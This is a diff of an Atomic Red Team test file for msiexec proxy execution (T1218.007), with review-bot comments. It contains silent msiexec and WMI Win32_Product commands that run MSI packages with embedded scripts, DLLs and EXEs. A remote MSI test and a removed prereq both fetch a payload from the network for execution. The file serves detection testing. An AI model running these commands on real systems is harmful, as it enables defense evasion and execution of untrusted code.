+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #3 - Msiexec.exe - Execute Local MSI file with an embedded DLL
+Executes an MSI containing an embedded DLL using msiexec.exe
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 628fa796-76c5-44c3-93aa-b9d8214fd568
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Msiexec.exe - Execute Local MSI file with an embedded EXE
+Executes an MSI containing an embedded EXE using msiexec.exe
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ed3fa08a-ca18-4009-973e-03d13014d0e8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi|
+| action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /q /#{action} "#{msi_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - WMI Win32_Product Class - Execute Local MSI file with embedded JScript
+Executes an MSI containing embedded JScript code using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 882082f0-27c6-4eec-a43c-9aa80bccdb30
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
+Executes an MSI containing embedded VBScript code using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cf470d9a-58e7-43e5-b0d2-805dffc05576
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
+Executes an MSI containing an embedded DLL using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 32eb3861-30da-4993-897a-42737152f5f8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #8 - WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
+Executes an MSI containing an embedded EXE using the WMI Win32_Product class
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 55080eb0-49ae-4f55-a440-4167b7974f79
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi|
+| action | Specifies the MSI action to perform: Install, Admin, Advertise. The included MSI is designed to support all three action types. | String | Install|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-CimMethod -ClassName Win32_Product -MethodName #{action} -Arguments @{ PackageLocation = '#{msi_payload}' }
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The MSI file must exist on disk at specified location (#{msi_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #9 - Msiexec.exe - Execute the DllRegisterServer function of a DLL
+Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "src" folder is only built for 64-bit, so this won't work on a 32-bit OS.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute that has an implemented DllRegisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /y "#{dll_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The DLL must exist on disk at specified location (#{dll_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #10 - Msiexec.exe - Execute the DllUnregisterServer function of a DLL
+Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "src" folder is only built for 64-bit, so this won't work on a 32-bit OS.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ab09ec85-4955-4f9c-b8e0-6851baf4d47f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_payload | DLL to execute that has an implemented DllUnregisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+msiexec.exe /z "#{dll_payload}"
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The DLL must exist on disk at specified location (#{dll_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You must provide your own MSI"
+```
+
+
+
+
+
+
+
+## Atomic Test #11 - Msiexec.exe - Execute Remote MSI file
+Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 44a4bedf-ffe3-452e-bee4-6925ab125662
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi|
#### Attack Commands: Run with `command_prompt`!
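Review bot: In Atomic Tests #9 and #10 the Get Prereq Commands print `Write-Host "You must provide your own MSI"`, but the dependency in those two tests is the DLL at `#{dll_payload}`, so the message looks copied from the MSI tests and should name the DLL. The same message in Tests #4 through #8 also conflicts with the input descriptions, which refer to "the included MSI" and default to files under `PathToAtomicsFolder\T1218.007\src\`; either state that the file ships in `src` or have the prereq fetch it. Separately, every Check Prereq passes the path unquoted (`Test-Path #{msi_payload}`, `Test-Path #{dll_payload}`), which fails when the atomics folder path contains a space; quote it the way the attack commands already do.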
@@ -90,52 +519,4 @@ msiexec.exe /q /i "#{msi_payload}"
-
-
-
-## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL
-Execute arbitrary DLL file stored locally. Commonly seen in application installation.
-Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder.
-By default, if the src folder is not in place, it will download the 64 bit version.
-
-**Supported Platforms:** Windows
-
-
-**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| dll_payload | DLL to execute | Path | PathToAtomicsFolder\T1218.007\src\x64\T1218.dll|
-
-
-#### Attack Commands: Run with `command_prompt`!
-
-
-```cmd
-msiexec.exe /y "#{dll_payload}"
-```
-
-
-
-
-#### Dependencies: Run with `powershell`!
-##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"
-```
-
-
-
-
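Review bot: Removing Atomic Test #3 also removes a Get Prereq that actually fetched its payload (`Invoke-WebRequest ... -OutFile "#{dll_payload}"`), while the test that takes over the same `msiexec.exe /y "#{dll_payload}"` command, Test #9, only prints a message when the DLL is missing, so an unattended prereq run can no longer satisfy the dependency. Consider carrying the download step over for `MSIRunner.dll`. The removed description also told 32-bit users to point `dll_payload` at the Win32 folder, whereas the replacement says the DLL is 64-bit only; if dropping 32-bit coverage is intended, say so in the commit message, together with the fact that guid 66f64bd5-7c35-4c24-953a-04ca30a0a0ec is retired in favour of 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d.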